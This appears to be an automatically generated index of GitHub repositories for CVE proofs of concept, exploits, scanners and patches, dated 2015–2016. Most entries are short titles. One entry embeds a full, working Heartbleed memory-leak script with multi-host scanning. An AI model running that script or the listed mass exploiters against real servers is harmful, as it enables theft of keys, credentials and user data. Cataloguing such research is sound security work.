**Automated Exploit Toolkit for CVE-2015-6095 and CVE-2016-0049** : [JackOfMostTrades/bluebox](https://github.com/JackOfMostTrades/bluebox) create time: 2016-02-18T22:38:51Z

**no description** : [betalphafai/CVE-2015-6637](https://github.com/betalphafai/CVE-2015-6637) create time: 2016-02-18T14:39:04Z

**glibc check and update in light of CVE-2015-7547** : [rexifiles/rex-sec-glibc](https://github.com/rexifiles/rex-sec-glibc) create time: 2016-02-18T12:56:33Z

**Small script to patch CVE-2015-7547** : [JustDenisYT/glibc-patcher](https://github.com/JustDenisYT/glibc-patcher) create time: 2016-02-17T11:51:44Z

**no description** : [t0r0t0r0/CVE-2015-7547](https://github.com/t0r0t0r0/CVE-2015-7547) create time: 2016-02-17T11:36:35Z

**test script for CVE-2015-7547** : [cakuzo/CVE-2015-7547](https://github.com/cakuzo/CVE-2015-7547) create time: 2016-02-17T00:51:22Z

**Heartbleed** : [Xyl2k/CVE-2014-0160-Chrome-Plugin](https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin) create time: 2016-02-16T15:49:55Z

**no description** : [betalphafai/CVE-2015-6640](https://github.com/betalphafai/CVE-2015-6640) create time: 2016-02-15T08:13:20Z

**CVE-2016-1287 vulnerability test** : [jgajek/killasa](https://github.com/jgajek/killasa) create time: 2016-02-15T04:56:15Z

**This app verifies if your device is still vulnerable to CVE-2015-3825 / CVE-2015-3837, aka "One Class to Rule Them All", by checking if it contains the vulnerable conscrypt's OpenSSLX509Certificate class. A patch was released in August 2015 by Google.** : [roeeh/conscryptchecker](https://github.com/roeeh/conscryptchecker) create time: 2016-02-13T08:57:44Z

**no description** : [Gitlabpro/The-analysis-of-the-cve-2015-8651](https://github.com/Gitlabpro/The-analysis-of-the-cve-2015-8651) create time: 2016-02-12T09:28:05Z

**Proof of concept for CVE-2015-7547** : [fjserna/CVE-2015-7547](https://github.com/fjserna/CVE-2015-7547) create time: 2016-02-10T21:13:54Z

**EoP (Win7) & BSoD (Win10) PoC for CVE-2016-0051 (MS-016)** : [koczkatamas/CVE-2016-0051](https://github.com/koczkatamas/CVE-2016-0051) create time: 2016-02-09T21:30:34Z

**Payload generator for Java Binary Deserialization attack with Commons FileUpload (CVE-2013-2186)** : [GrrrDog/ACEDcup](https://github.com/GrrrDog/ACEDcup) create time: 2016-02-08T08:29:11Z

**CVE-2015-8562 Exploit in bash** : [atcasanova/cve-2015-8562-exploit](https://github.com/atcasanova/cve-2015-8562-exploit) create time: 2016-02-08T04:03:26Z

**Trigger and exploit code for CVE-2014-4113** : [sam-b/CVE-2014-4113](https://github.com/sam-b/CVE-2014-4113) create time: 2016-02-07T14:18:45Z

**[discontinued] Mass exploiter of CVE 2015-8562 for Joomla! CMS** : [paralelo14/JoomlaMassExploiter](https://github.com/paralelo14/JoomlaMassExploiter) create time: 2016-02-05T21:32:40Z

**[discontinued] Mass exploiter of CVE-2015-1579 for WordPress CMS** : [paralelo14/WordPressMassExploiter](https://github.com/paralelo14/WordPressMassExploiter) create time: 2016-02-03T21:44:11Z

**spring mvc cve-2014-3625** : [ilmila/springcss-cve-2014-3625](https://github.com/ilmila/springcss-cve-2014-3625) create time: 2016-02-03T12:51:44Z

**no description** : [luanjampa/cve-2016-0701](https://github.com/luanjampa/cve-2016-0701) create time: 2016-02-02T22:53:34Z

**A testbed for CVE-2016-0728, a refcount leak/overflow bug in Linux** : [neuschaefer/cve-2016-0728-testbed](https://github.com/neuschaefer/cve-2016-0728-testbed) create time: 2016-01-28T22:38:13Z

**no description** : [forced-request/rails-rce-cve-2016-0752](https://github.com/forced-request/rails-rce-cve-2016-0752) create time: 2016-01-26T15:25:34Z

**Exploit code for CVE-2014-7920 and CVE-2014-7921 - code-exec in mediaserver up to Android 5.1** : [laginimaineb/cve-2014-7920-7921](https://github.com/laginimaineb/cve-2014-7920-7921) create time: 2016-01-24T13:49:03Z

**no description** : [googleweb/CVE-2016-0728](https://github.com/googleweb/CVE-2016-0728) create time: 2016-01-23T09:17:21Z

**Exploit CVE-2014-4113** : [nsxz/Exploit-CVE-2014-4113](https://github.com/nsxz/Exploit-CVE-2014-4113) create time: 2016-01-22T07:05:52Z

**no description** : [nardholio/cve-2016-0728](https://github.com/nardholio/cve-2016-0728) create time: 2016-01-22T03:52:11Z

**no description** : [fochess/cve_2016_0728](https://github.com/fochess/cve_2016_0728) create time: 2016-01-22T03:13:57Z

**just testing the flaw.** : [mfer/cve_2016_0728](https://github.com/mfer/cve_2016_0728) create time: 2016-01-21T11:26:42Z

**no description** : [sunnyjiang/cve_2016_0728](https://github.com/sunnyjiang/cve_2016_0728) create time: 2016-01-21T08:37:42Z

**CVE-2016-0728 Linux Kernel Vulnerability** : [kennetham/cve_2016_0728](https://github.com/kennetham/cve_2016_0728) create time: 2016-01-20T15:23:52Z

**cve_2016_0728** : [isnuryusuf/cve_2016_0728](https://github.com/isnuryusuf/cve_2016_0728) create time: 2016-01-20T12:22:07Z

**Simple Exploit for Verification of CVE-2015-6606** : [michaelroland/omapi-cve-2015-6606-exploit](https://github.com/michaelroland/omapi-cve-2015-6606-exploit) create time: 2016-01-19T16:16:22Z

**no description** : [idl3r/cve-2016-0728](https://github.com/idl3r/cve-2016-0728) create time: 2016-01-19T12:55:49Z

**PoC for CVE-2015-6086** : [payatu/CVE-2015-6086](https://github.com/payatu/CVE-2015-6086) create time: 2016-01-18T11:32:41Z

**no description** : [cinno/CVE-2015-7755-POC](https://github.com/cinno/CVE-2015-7755-POC) create time: 2016-01-09T22:49:07Z

**no description** : [securifera/CVE-2015-2900-Exploit](https://github.com/securifera/CVE-2015-2900-Exploit) create time: 2016-01-06T18:34:44Z

**A proof of concept for Joomla's CVE-2015-8562 vulnerability** : [RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC](https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC) create time: 2016-01-04T22:27:06Z

**All versions of the Joomla! below 3.4.6 are known to be vulnerable. But exploitation is possible with PHP versions below 5.5.29, 5.6.13 and below 5.5.** : [ZaleHack/joomla_rce_CVE-2015-8562](https://github.com/ZaleHack/joomla_rce_CVE-2015-8562) create time: 2016-01-04T13:37:25Z

**exploit for cve-2014-7911; android; java deserialization ;system privilege;ace;** : [GeneBlue/cve-2014-7911-exp](https://github.com/GeneBlue/cve-2014-7911-exp) create time: 2015-12-29T07:28:46Z

**no description** : [ockeghem/CVE-2015-6835-checker](https://github.com/ockeghem/CVE-2015-6835-checker) create time: 2015-12-19T07:55:53Z

**Notes, binaries, and related information from analysis of the CVE-2015-7755 & CVE-2015-7756 issues within Juniper ScreenOS** : [hdm/juniper-cve-2015-7755](https://github.com/hdm/juniper-cve-2015-7755) create time: 2015-12-18T20:20:01Z

**Automatically exported from code.google.com/p/apache-reverse-proxy-cve20114317** : [charmstead/apache-reverse-proxy-cve20114317](https://github.com/charmstead/apache-reverse-proxy-cve20114317) create time: 2015-12-18T08:29:10Z

**CVE-2015-7545 proof of concept** : [avuserow/bug-free-chainsaw](https://github.com/avuserow/bug-free-chainsaw) create time: 2015-12-16T21:44:48Z

**POC for CVE-2015-6620, AMessage unmarshal arbitrary write** : [flankerhqd/CVE-2015-6620-POC](https://github.com/flankerhqd/CVE-2015-6620-POC) create time: 2015-12-16T03:09:30Z

**Crash PoC** : [Pray3r/CVE-2015-8088](https://github.com/Pray3r/CVE-2015-8088) create time: 2015-12-09T07:18:41Z

**Python script to generate a malicious MP4 file and start a CherryPy web server hosting a simple HTML page with the embedded file. Exploits another Stagefright vulnerability, the integer overflow (CVE-2015-3864).** : [eudemonics/scaredycat](https://github.com/eudemonics/scaredycat) create time: 2015-12-08T18:27:52Z

**Estudo e apresentação do bug CVE-2014-4943 para a disciplina MAC0448** : [redes-2015/l2tp-socket-bug](https://github.com/redes-2015/l2tp-socket-bug) create time: 2015-11-22T13:58:57Z

**A PoC for the Bamboo deserialization exploit** : [CallMeJonas/CVE-2015-6576](https://github.com/CallMeJonas/CVE-2015-6576) create time: 2015-11-20T14:16:18Z

**no description** : [flankerhqd/cve-2015-6612poc-forM](https://github.com/flankerhqd/cve-2015-6612poc-forM) create time: 2015-11-16T10:50:42Z

**Exploit for CVE-2015-6357 Cisco FireSIGHT Management Center Certificate Validation Vulnerability** : [mattimustang/firepwner](https://github.com/mattimustang/firepwner) create time: 2015-11-16T10:15:47Z

**no description** : [secmob/CVE-2015-6612](https://github.com/secmob/CVE-2015-6612) create time: 2015-11-16T07:04:02Z

**no description** : [kanpol/PoCForCVE-2015-1528](https://github.com/kanpol/PoCForCVE-2015-1528) create time: 2015-11-14T06:11:53Z

**simple poc for cve-2015-5932 / cve-2015-5847 / cve-2015-5864** : [jndok/tpwn-bis](https://github.com/jndok/tpwn-bis) create time: 2015-11-12T20:36:26Z

**My exploit for kernel exploitation** : [zerodavinci/CVE-2014-3153-exploit](https://github.com/zerodavinci/CVE-2014-3153-exploit) create time: 2015-11-08T09:40:59Z

**no description** : [marZiiw/Stagefright_CVE-2015-1538-1](https://github.com/marZiiw/Stagefright_CVE-2015-1538-1) create time: 2015-11-07T02:58:15Z

**PoC code for vBulletin PreAuth vulnerability** : [Prajithp/CVE-2015-7808](https://github.com/Prajithp/CVE-2015-7808) create time: 2015-11-06T19:47:46Z

**no description** : [heeeeen/CVE-2014-7911poc](https://github.com/heeeeen/CVE-2014-7911poc) create time: 2015-11-03T03:42:05Z

**Joomla! 3.2 to 3.4.4 - SQL Injection (CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858)** : [CCrashBandicot/ContentHistory](https://github.com/CCrashBandicot/ContentHistory) create time: 2015-11-02T03:03:35Z

**Script to extract malicious payload and decoy document from CVE-2015-1641 exploit documents** : [Cyberclues/rtf_exploit_extractor](https://github.com/Cyberclues/rtf_exploit_extractor) create time: 2015-10-27T00:23:36Z

**cve-2014-4323 poc** : [marcograss/cve-2014-4323](https://github.com/marcograss/cve-2014-4323) create time: 2015-10-15T04:21:08Z

**Quick and dirty .py for checking (CVE-2015-1635) MS15-034 + DoS attack option** : [wiredaem0n/chk-ms15-034](https://github.com/wiredaem0n/chk-ms15-034) create time: 2015-10-14T06:21:21Z

**CVE-2015-1157 telnet server** : [perillamint/CVE-2015-1157](https://github.com/perillamint/CVE-2015-1157) create time: 2015-10-14T04:43:29Z

**no description** : [sariyamelody/CVE-2015-5290](https://github.com/sariyamelody/CVE-2015-5290) create time: 2015-10-11T19:55:28Z

**CVE-2014-2323 exploit demonstration** : [cirocosta/lighty-sqlinj-demo](https://github.com/cirocosta/lighty-sqlinj-demo) create time: 2015-10-08T12:33:30Z

**CVE-2015-3636 exploit** : [android-rooting-tools/libpingpong_exploit](https://github.com/android-rooting-tools/libpingpong_exploit) create time: 2015-10-07T12:54:57Z

**no description** : [gina-alaska/bash-cve-2014-7169-cookbook](https://github.com/gina-alaska/bash-cve-2014-7169-cookbook) create time: 2015-09-30T18:06:13Z

**CVE-2015-3073 PoC** : [reigningshells/CVE-2015-3073](https://github.com/reigningshells/CVE-2015-3073) create time: 2015-09-27T00:19:23Z

**Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)** : [hybridus/heartbleedscanner](https://github.com/hybridus/heartbleedscanner) create time: 2015-09-24T08:39:28Z

**PoC code for 32 bit Android OS** : [fi01/CVE-2015-3636](https://github.com/fi01/CVE-2015-3636) create time: 2015-09-12T01:31:36Z

**An exploit for CVE-2015-1538-1 - Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution** : [jduck/cve-2015-1538-1](https://github.com/jduck/cve-2015-1538-1) create time: 2015-09-10T23:00:59Z

**An exploit for CVE-2015-1538-1 - Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution** : [renjithsasidharan/cve-2015-1538-1](https://github.com/renjithsasidharan/cve-2015-1538-1) create time: 2015-09-10T19:34:11Z

**Archive from the article CVE-2015-5119 Flash ByteArray UaF: A beginner's walkthrough** : [CiscoCXSecurity/CVE-2015-5119_walkthrough](https://github.com/CiscoCXSecurity/CVE-2015-5119_walkthrough) create time: 2015-09-10T10:10:36Z

**An exploit for CVE-2015-1538-1 - Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution** : [oguzhantopgul/cve-2015-1538-1](https://github.com/oguzhantopgul/cve-2015-1538-1) create time: 2015-09-09T16:28:30Z

**CVE-2015-2231 POC** : [rednaga/adups-get-super-serial](https://github.com/rednaga/adups-get-super-serial) create time: 2015-09-08T18:39:14Z

**no description** : [drone789/CVE-2012-1823](https://github.com/drone789/CVE-2012-1823) create time: 2015-09-08T14:37:25Z

**Just an attempt to adapt for Note 4, I do not know what I am doing.** : [askk/CVE-2014-4322_adaptation](https://github.com/askk/CVE-2014-4322_adaptation) create time: 2015-09-04T12:05:56Z

**no description** : [ludongxu/cve-2015-3636](https://github.com/ludongxu/cve-2015-3636) create time: 2015-08-31T03:28:51Z

**An implementation of the CVE-2015-2153 exploit.** : [arntsonl/CVE-2015-2153](https://github.com/arntsonl/CVE-2015-2153) create time: 2015-08-27T17:21:36Z

**CVE-2015-3636 exploit** : [askk/libping_unhash_exploit_POC](https://github.com/askk/libping_unhash_exploit_POC) create time: 2015-08-21T06:39:30Z

**Windows 2k3 tcpip.sys Privilege Escalation** : [fungoshacks/CVE-2014-4076](https://github.com/fungoshacks/CVE-2014-4076) create time: 2015-08-20T10:56:52Z

**PoC exploit for CVE-2015-5477 in php** : [ilanyu/cve-2015-5477](https://github.com/ilanyu/cve-2015-5477) create time: 2015-08-19T02:35:36Z

**PoC - Binary patches for CVE-2015-3864 (NOT for production, use at your own risk)** : [pwnaccelerator/stagefright-cve-2015-3864](https://github.com/pwnaccelerator/stagefright-cve-2015-3864) create time: 2015-08-18T06:24:25Z

**CVE fixes 2015-1789/1790/4000** : [neominds/RIC190022](https://github.com/neominds/RIC190022) create time: 2015-08-16T02:49:46Z

**CVE-2014-4322 Exploit** : [laginimaineb/cve-2014-4322](https://github.com/laginimaineb/cve-2014-4322) create time: 2015-08-16T00:02:45Z

**xnu local privilege escalation via cve-2015-???? & cve-2015-???? for 10.10.5, 0day at the time | poc or gtfo** : [kpwn/tpwn](https://github.com/kpwn/tpwn) create time: 2015-08-15T21:21:29Z

**Exploit for CVE-2015-4495 / mfsa2015-78** : [vincd/CVE-2015-4495](https://github.com/vincd/CVE-2015-4495) create time: 2015-08-10T22:46:46Z

**PoC for BIND9 TKEY assert DoS (CVE-2015-5477)** : [knqyf263/cve-2015-5477](https://github.com/knqyf263/cve-2015-5477) create time: 2015-08-09T16:09:52Z

**Vulnerability as a service: showcasing CVS-2015-5447, a DDoS condition in the bind9 software** : [hmlio/vaas-cve-2015-5477](https://github.com/hmlio/vaas-cve-2015-5477) create time: 2015-08-04T21:11:45Z

**PoC exploit code for CVE-2015-5477 BIND9 TKEY remote DoS vulnerability** : [elceef/tkeypoc](https://github.com/elceef/tkeypoc) create time: 2015-08-01T09:27:23Z

**PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure** : [robertdavidgraham/cve-2015-5477](https://github.com/robertdavidgraham/cve-2015-5477) create time: 2015-07-31T23:29:43Z

**A little Python tool for exploiting CVE-2015-1560 and CVE-2015-1561. Quick'n'dirty. Real dirty.** : [Iansus/Centreon-CVE-2015-1560_1561](https://github.com/Iansus/Centreon-CVE-2015-1560_1561) create time: 2015-07-31T14:37:50Z

**no description** : [jvazquez-r7/CVE-2015-5119](https://github.com/jvazquez-r7/CVE-2015-5119) create time: 2015-07-29T20:21:20Z

**no description** : [betalphafai/cve-2015-3636_crash](https://github.com/betalphafai/cve-2015-3636_crash) create time: 2015-07-25T09:29:27Z

**Patched version of the uploader.swf and uploaderSingle.swf to fix CVE-2011-2461** : [u-maxx/magento-swf-patched-CVE-2011-2461](https://github.com/u-maxx/magento-swf-patched-CVE-2011-2461) create time: 2015-07-24T10:17:05Z

**I'll submit the poc after blackhat** : [secmob/PoCForCVE-2015-1528](https://github.com/secmob/PoCForCVE-2015-1528) create time: 2015-07-17T06:09:41Z

**Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed** : [hmlio/vaas-cve-2014-0160](https://github.com/hmlio/vaas-cve-2014-0160) create time: 2015-07-12T22:40:54Z

**Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock** : [hmlio/vaas-cve-2014-6271](https://github.com/hmlio/vaas-cve-2014-6271) create time: 2015-07-11T21:42:05Z

**no description** : [ele7enxxh/CVE-2014-7911](https://github.com/ele7enxxh/CVE-2014-7911) create time: 2015-07-03T04:43:07Z

**Docker + CVE-2015-2925 = escaping from --volume** : [Kagami/docker_cve-2015-2925](https://github.com/Kagami/docker_cve-2015-2925) create time: 2015-06-30T17:32:51Z

**A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug).** : [P0cL4bs/ShellShock-CGI-Scan](https://github.com/P0cL4bs/ShellShock-CGI-Scan) create time: 2015-06-26T23:34:01Z

**This is an Android Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271** : [sunnyjiang/shellshocker-android](https://github.com/sunnyjiang/shellshocker-android) create time: 2015-06-17T12:36:49Z

**Proof of Concept code for CVE-2015-0345 (APSB15-07)** : [BishopFox/coldfusion-10-11-xss](https://github.com/BishopFox/coldfusion-10-11-xss) create time: 2015-06-11T10:27:49Z

**reading course** : [huanlu/cve-2014-6271-huan-lu](https://github.com/huanlu/cve-2014-6271-huan-lu) create time: 2015-06-10T02:04:43Z

**no description** : [redhatkaty/-cve-2010-3904-report](https://github.com/redhatkaty/-cve-2010-3904-report) create time: 2015-06-09T22:27:23Z

**no description** : [marstornado/cve-2014-0160-Yunfeng-Jiang](https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang) create time: 2015-06-09T03:55:14Z

**no description** : [weidongl74/cve-2015-2315-report](https://github.com/weidongl74/cve-2015-2315-report) create time: 2015-06-08T20:48:10Z

**system reading course** : [kelleykong/cve-2014-6271-mengjia-kong](https://github.com/kelleykong/cve-2014-6271-mengjia-kong) create time: 2015-06-06T03:27:24Z

**A proof of concept exploit for the CVE-2013-1965 vulnerability affecting Apache Struts 2** : [cinno/CVE-2013-1965](https://github.com/cinno/CVE-2013-1965) create time: 2015-06-04T18:47:35Z

**cve-2015-3043 flash exploit** : [whitehairman/Exploit](https://github.com/whitehairman/Exploit) create time: 2015-05-21T01:09:49Z

**CVE 2015-4024 , bug #69364 , multi process php load test** : [typcn/php-load-test](https://github.com/typcn/php-load-test) create time: 2015-05-20T11:47:02Z

**Experiments related to CVE-2015-3456** : [vincentbernat/cve-2015-3456](https://github.com/vincentbernat/cve-2015-3456) create time: 2015-05-17T20:14:47Z

**Win32k LPE vulnerability used in APT attack** : [hfiref0x/CVE-2015-1701](https://github.com/hfiref0x/CVE-2015-1701) create time: 2015-05-12T18:04:48Z

**This is a functional proof of concept program to aid in exploiting systems vulnerable to CVE 2008-0244. This vulnerability specifically relates to issues in how the SAP MaxDB protocol handles specially crafted packets. It is possible to execute system level commands remotely.** : [gregkcarson/sapmdbret](https://github.com/gregkcarson/sapmdbret) create time: 2015-05-11T16:55:19Z

**A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..** : [iSCInc/heartbleed](https://github.com/iSCInc/heartbleed) create time: 2015-05-08T14:37:44Z

**Concurrent network scanner for CVE-2015-1635** : [technion/erlvulnscan](https://github.com/technion/erlvulnscan) create time: 2015-05-04T09:40:29Z

**CVE-2012-1876 simple calc exploitation** : [WizardVan/CVE-2012-1876](https://github.com/WizardVan/CVE-2012-1876) create time: 2015-05-03T18:37:15Z

**CVE-2012-4792 simple calc exploitation** : [WizardVan/CVE-2012-4792](https://github.com/WizardVan/CVE-2012-4792) create time: 2015-05-03T18:33:28Z

**Exploits the arbitrary file write bug in proftpd (CVE-2015-3306) attempts code execution** : [nootropics/propane](https://github.com/nootropics/propane) create time: 2015-04-26T14:14:34Z

**cve_2015-1635** : [neu5ron/cve_2015-1635](https://github.com/neu5ron/cve_2015-1635) create time: 2015-04-21T17:22:01Z

**Tool for exploit CVE-2015-3306** : [chcx/cpx_proftpd](https://github.com/chcx/cpx_proftpd) create time: 2015-04-21T12:51:51Z

**Exploit I used to claim 10% final-grade extra credit in Matthew Might's Compilers class.** : [ScottyBauer/CVE-2015-1318](https://github.com/ScottyBauer/CVE-2015-1318) create time: 2015-04-17T20:53:29Z

**CVE-2015-1635,MS15-034** : [Zx7ffa4512-Python/Project-CVE-2015-1635](https://github.com/Zx7ffa4512-Python/Project-CVE-2015-1635) create time: 2015-04-16T07:31:47Z

**PoC Java exploit based on http://www.contextis.com/research/blog/java-pwn2own/** : [v-p-b/buherablog-cve-2013-1488](https://github.com/v-p-b/buherablog-cve-2013-1488) create time: 2015-04-16T07:12:19Z

**RootPipe (CVE-2015-1130) and Phoenix (CVE-2015-3673) vulnerability testing utility for Mac OS X 10.2.8 and later** : [sideeffect42/RootPipeTester](https://github.com/sideeffect42/RootPipeTester) create time: 2015-04-15T15:12:07Z

**🔥 A checker site for MS15-034 / CVE-2015-1635** : [xPaw/HTTPsys](https://github.com/xPaw/HTTPsys) create time: 2015-04-15T15:05:01Z

**Docker simulating cve-2015-2208 vulnerability** : [ptantiku/cve-2015-2208](https://github.com/ptantiku/cve-2015-2208) create time: 2015-04-11T09:02:47Z

**Proof of Concept OS X Application for RootPipe Privilege Escalation Vulnerability (CVE-2015-1130)** : [Shmoopi/RootPipe-Demo](https://github.com/Shmoopi/RootPipe-Demo) create time: 2015-04-10T20:43:13Z

**Metasploit modules and payload generation files from my Houston Perl Mongers talk about this vulnerability.** : [lightsey/cve-2015-1592](https://github.com/lightsey/cve-2015-1592) create time: 2015-04-10T16:16:51Z

**no description** : [locisvv/Vulnerable-CVE-2014-8609](https://github.com/locisvv/Vulnerable-CVE-2014-8609) create time: 2015-04-07T09:50:50Z

**#!/usr/bin/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) #print ' %04x: %-48s %s' % (b, hxdat, pdat) pdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print "Error receiving data: ", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp/pop3/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send("EHLO someone.org\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if pop3/imap supports starttls/stls elif port in {110, 143}: print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send("CAPA\n") if port == 143: s.send("CAPABILITY\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if ftp supports auth tls/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send("FEAT\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "AUTH TLS" in check: opts.starttls = True atls = True print "AUTH TLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send("STLS\n") elif atls: print 'Sending AUTH TLS Command...' s.send("AUTH TLS\n") else: print 'Sending STARTTLS Command...' s.send("STARTTLS\n") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print "Error connecting to host: ", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, "r") for line in fileIN: targetinfo = line.strip().split(":") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()** : [xanas/heartbleed.py](https://github.com/xanas/heartbleed.py) create time: 2015-04-05T22:03:30Z

**CVE-2015-3152 PoC** : [duo-labs/mysslstrip](https://github.com/duo-labs/mysslstrip) create time: 2015-04-05T17:48:12Z

**CVE-2013-2094 kernel exploit for i386** : [timhsutw/cve-2013-2094](https://github.com/timhsutw/cve-2013-2094) create time: 2015-03-29T12:55:03Z

**:muscle: Proof Of Concept of the BEAST attack against SSL/TLS CVE-2011-3389 :muscle:** : [mpgn/BEAST-PoC](https://github.com/mpgn/BEAST-PoC) create time: 2015-03-28T10:28:16Z

**CVE-2015-0235 EXIM ESTMP GHOST Glibc Gethostbyname() DoS Exploit/PoC** : [arm13/ghost_exploit](https://github.com/arm13/ghost_exploit) create time: 2015-03-28T01:26:05Z

